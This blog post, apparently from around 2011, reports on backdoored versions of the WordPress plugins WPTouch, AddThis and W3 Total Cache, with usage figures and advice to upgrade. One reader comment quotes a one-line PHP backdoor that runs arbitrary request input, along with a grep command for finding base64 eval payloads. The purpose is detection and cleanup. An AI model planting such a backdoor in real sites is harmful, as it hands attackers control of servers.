WordPress Security Exploit Found: Upgrade WPTouch, AddThis and W3 Total Cache

Notice that you can’t get access to the forums or trac? Can’t commit a plugin or theme? Yesterday Matt announced that WordPress had force reset all WordPress passwords due to a security breach. Three popular plugins – WPTouch, AddThis and W3 Total Cache - were found to contain backdoor trojans. These were not added by the plugin developers themselves whose own WordPress accounts were compromised and new versions of the plugins were uploaded.

Let’s Look at The Scale of the Problem

A quick look at the stats in the WordPress repository gives an indication of quite how big the potential problem is:

Aaron at AddThis has said on his blog that the offending plugin is 2.1.3 if it was downloaded on 20th or 21st June. It was downloaded 3,583 times yesterday. Here’s how many people are currently using 2.1.3:

AddThis 2.1.3 with 14.3% share of active plugins

The affected versions of WPTouch are 1.9.27 and 1.9.28 – again only if you updated in the past few days. It was downloaded 14,670 times yesterday. Here’s how many people are using those versions:

WPTouch 1.9.27 used by 15.3% active users

I can’t find which version of W3 Total Cache is affected but from the uploads on it’s trac page it looks like 0.9.2.2 (please correct me if that’s wrong!). Again check your dates. It was downloaded 3,442 times yesterday.

W3Total Cache stats showing 28.6% os users using 0.9.2.2

Again, I really want to stress that the real issue is with plugins updated or downloaded on 20th or 21st June. Personally I struggle to remember what I’ve done over the past few days so to be safe I would update these plugins – it’s always good to be up-to-date anyway.

What Should I Do?

  • Don’t panic or fire off angry emails
  • Upgrade these plugins immediately- they all have new versions which will fix the exploit
  • Change all of your passwords

To keep up to date you can watch out on the WordPress News blog which tends to have all of the latest, most important, WordPress happenings.

Comments (9)

  1. I can confirm, having 2 of these plugins installed, that I had a trojan set itself up cozy in my server last week, and I spent about a day cleansing it.
    The effected files, in my case, were all index.php files, with the classic “eval(base64_decode(” code, which inserted “<iframe" codes at the start of all web pages.

    From your web root, you can run this command to see if it has crept into any files:
    find . -exec grep "eval(base64_decode" '{}' \; -print, but the real source was probably another file with code like this:
    <?php if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));

  2. Well the biggest worrying questions in my opinion are: 1. How did that happen in the first place?
    2. How did the hackers manage to insert that code in 3 different plugins almost all in once?
    3. How to prevent that from happening again to other plugins?

  3. The more immediate question is surely:

    How many other plugins have been affected but we don’t know about it yet?

    Have they done a repository scan to ensure it is really only these three plugins? Or how can we be sure that it is only these three plugins?

  4. Indeed, this exploit has been documented for WP-phpMyAdmin (and perhaps other installations of phpMyAdmin or phpPgAdmin). It’s a good idea to scan your files, as I showed above, if you suspect anything.

Participate